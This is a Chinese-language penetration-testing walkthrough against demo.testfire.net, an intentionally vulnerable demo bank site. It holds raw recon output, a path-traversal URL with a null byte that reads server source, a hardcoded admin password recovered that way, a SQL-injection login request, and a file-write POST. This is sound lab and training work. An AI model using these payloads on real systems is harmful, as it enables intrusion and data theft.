demo.testfire.net
信息搜集
域名
IP 端口信息
1
1
65.61.137.117
2
nmap 信息
x
1
root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A 65.61.137.117
2
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT
3
Nmap scan report for 65.61.137.117
4
Host is up (0.60s latency).
5
Not shown: 995 closed ports
6
PORT STATE SERVICE VERSION
7
80/tcp open http Microsoft IIS httpd 8.0
8
| http-cookie-flags:
9
| /:
10
| amSessionId:
11
|_ httponly flag not set
12
| http-methods:
13
|_ Potentially risky methods: TRACE
14
|_http-server-header: Microsoft-IIS/8.0
15
|_http-title: Altoro Mutual
16
443/tcp open ssl/http Microsoft IIS httpd 8.0
17
| http-cookie-flags:
18
| /:
19
| amSessionId:
20
|_ httponly flag not set
21
| http-methods:
22
|_ Potentially risky methods: TRACE
23
|_http-server-header: Microsoft-IIS/8.0
24
|_http-title: Altoro Mutual
25
| ssl-cert: Subject: commonName=demo.testfire.net
26
| Not valid before: 2014-07-01T09:54:37
27
|_Not valid after: 2019-12-22T09:54:37
28
|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.
29
445/tcp filtered microsoft-ds
30
514/tcp filtered shell
31
4444/tcp filtered krb524
32
Device type: general purpose
33
Running: Microsoft Windows XP|7|2012
34
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
35
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
36
Network Distance: 2 hops
37
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
38
39
Host script results:
40
|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s
41
42
TRACEROUTE (using port 1723/tcp)
43
HOP RTT ADDRESS
44
1 5.10 ms 192.168.245.2
45
2 26.32 ms 65.61.137.117
46
47
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
48
Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds
49
中间件
x
1
root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/
2
http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]
总结
- windows 服务器 , asp.net (aspx) . iis8
- 靶机网站, 域名, cdn 等信息无需搜集
漏洞挖掘
错误日志,泄露物理路径
GET 请求访问 http://demo.testfire.net/comment.aspx
1
An Error Has Occurred
2
Summary:
3
Value cannot be null.
4
5
Error Message:
6
System.ArgumentNullException: Value cannot be null. Parameter name: input at System.Text.RegularExpressions.Regex.IsMatch(String input) at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern) at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:downloadsAltoroMutual_v6websitecomment.aspx.cs:line 31 at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:downloadsAltoroMutual_v6websitecomment.aspx.cs:line 27 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
疑似程序路径
x
1
c:downloadsAltoroMutual_v6websitecomment.aspx.cs:line 31
登录处无验证码 ( maybe 暴力破解)
x
1
http://www.altoromutual.com/bank/login.aspx
任意文件内容读取
查看 login.aspx 的源代码
x
1
http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt
给出不存在的文件会报出目录信息
1
Could not find file 'C:downloadsAltoroMutual_v6websiteanklogin.aspx.cs,'
2
System.IO.FileNotFoundException: Could not find file 'C:downloadsAltoroMutual_v6websiteanklogin.aspx.cs,'.
3
File name: 'C:downloadsAltoroMutual_v6websiteanklogin.aspx.cs,'
4
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
5
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
6
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)
7
at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)
8
at System.IO.StreamReader..ctor(String path)
9
at System.IO.File.OpenText(String path)
10
at Altoro.Default.LoadFile(String myFile) in c:downloadsAltoroMutual_v6websitedefault.aspx.cs:line 42
11
at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:downloadsAltoroMutual_v6websitedefault.aspx.cs:line 70
12
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
13
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
14
at System.Web.UI.Control.OnLoad(EventArgs e)
15
at System.Web.UI.Control.LoadRecursive()
16
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
读取 /admin/login.aspx 的源码 拿到 管理员的密码
x
1
if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")
SQL 注入
1
POST /bank/login.aspx HTTP/1.1
2
Host: demo.testfire.net
3
Content-Length: 45
4
Cache-Control: max-age=0
5
Origin: http://demo.testfire.net
6
Upgrade-Insecure-Requests: 1
7
Content-Type: application/x-www-form-urlencoded
8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
10
Referer: http://demo.testfire.net/bank/login.aspx
11
Accept-Encoding: gzip, deflate
12
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
13
Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288
14
Connection: close
15
16
uid=hac425%27&passw=%27%27%27&btnSubmit=Login
写文件
貌似只能写 txt , 写 aspx 访问不了
x
1
POST /comment.aspx HTTP/1.1
2
Host: www.altoromutual.com
3
Content-Length: 111
4
Cache-Control: max-age=0
5
Origin: http://www.altoromutual.com
6
Upgrade-Insecure-Requests: 1
7
Content-Type: application/x-www-form-urlencoded
8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
10
Referer: http://www.altoromutual.com/feedback.aspx
11
Accept-Encoding: gzip, deflate
12
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
13
Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004
14
Connection: close
15
16
cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+